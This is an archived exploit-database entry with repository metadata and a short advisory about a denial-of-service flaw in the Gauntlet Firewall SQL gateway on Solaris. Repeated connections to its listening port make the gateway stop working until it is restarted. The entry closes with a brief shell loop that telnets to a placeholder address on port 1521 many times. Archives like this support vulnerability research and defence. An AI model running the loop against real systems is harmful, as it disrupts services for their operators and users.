exploit-db-mirror/exploits/linux/dos/23172.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

10 lines
No EOL
530 B
Text

source: http://www.securityfocus.com/bid/8683/info
The Gauntlet Firewall SQL gateway (sql-gw) is prone to denial of service attacks. It is possible to trigger this condition by making multiple connections to the port which the service listens on. The service will need to be restarted to regain normal functionality.
This issue was reported for Gauntlet Firewall version 6, running on Solaris. Other versions may also be affected.
for a in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
do
telnet aaa.bbb.ccc.ddd 1521
done